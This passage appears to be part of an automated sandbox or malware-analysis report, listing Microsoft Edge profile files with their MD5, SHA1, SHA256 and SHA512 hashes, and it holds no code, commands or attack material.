| SHA256 | 89eb25476b4390ff19b162af8ff48c2bb0db4e4a1f50b78b6ec0c2d49127e705 |
| SHA512 | 1ca1c10fb45248d2570f2f9972734be4a9047580664ae174d66c3431573a7b348251e6f876555c82c816a873f46104064b4adab82fbc9a3eb00b70ce118bdaab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 218edef7a2a3df9cfc878796a811a6c0 |
| SHA1 | ab8523ffd4f6860af430d32fa0790dce11fb4c5a |
| SHA256 | 94178a02ef6225ecef9b1965bd8c812ffc94392fa2680b6026e5b697c09bec88 |
| SHA512 | 245e17a1ed4574efe0eab4d66fd0042508f8c37d5b1b6357feca7cf3cc31cbecd3b86c50c6b38c52db1ea2bb76d33a45325f596495fe5bb8fbaeccc149e40b76 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c85584a8941801c467a7d242ff8d14ff |
| SHA1 | e188ab0e46f1621f4ec8a41722cce1f9c235ed25 |
| SHA256 | 302530a45a94200820ea0ffb8802dcb49caaf47798befe4148157a5b3a30a005 |
| SHA512 | 8d999e275ae72eacd52aa8a5257f1e301f4c53affed6b9b39d493980b5ac82a99ae52fb921f01c3941ecc3985ca517c3bcbfa685c3e8a20acb4c1332c839f897 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b3ef340b356f4e00f2ecb405ce8fc26e |
| SHA1 | adb75439c68362ae22bc75a362c8dbff25132526 |
| SHA256 | 6b669ff27e61cf8ee5eb39f0de54f91767f98217d94054c04db3114314b230ac |
| SHA512 | 4d6986310f4d1b0445c54f11ac0e58e00408479251493c853f76222188c46ee2633daed8e71e5b78d864722acb21771ef1986d48ae5671148a82f2e5e4e4f5d8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 619d73da29358847d789446f0422487a |
| SHA1 | 76ec7e772ac1e8a5885251f925fdf3c21ccda980 |
| SHA256 | e1fa63e763ec7af90a5d00176b45dc83d27bf559e51362895f122cc541c435b6 |
| SHA512 | 883907fb469cf146790988fcb860f9655abe8729773af3c7a41b5479364dc2491faa2a2e586ab30bdc5de2d573604cab5786b2d4f46c8929870793366e96c910 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 6db47911819db7c9debeb000f9b237bc |
| SHA1 | 53fdd121707ef6de4c356f333cac10078f9ce216 |
| SHA256 | d1d5214e2301995b9487d495dbbaef33512a286a5bbe30e6417e47ab4735e29b |
| SHA512 | 9cd646292ea58bd93a0e0332aefd4b2e1852a6b2b19b7d674f9cccccd8e4ad4843074d87f31d0f19bbbc6fa22b4081aa031254763f4f687f93e3b82aae17a78d |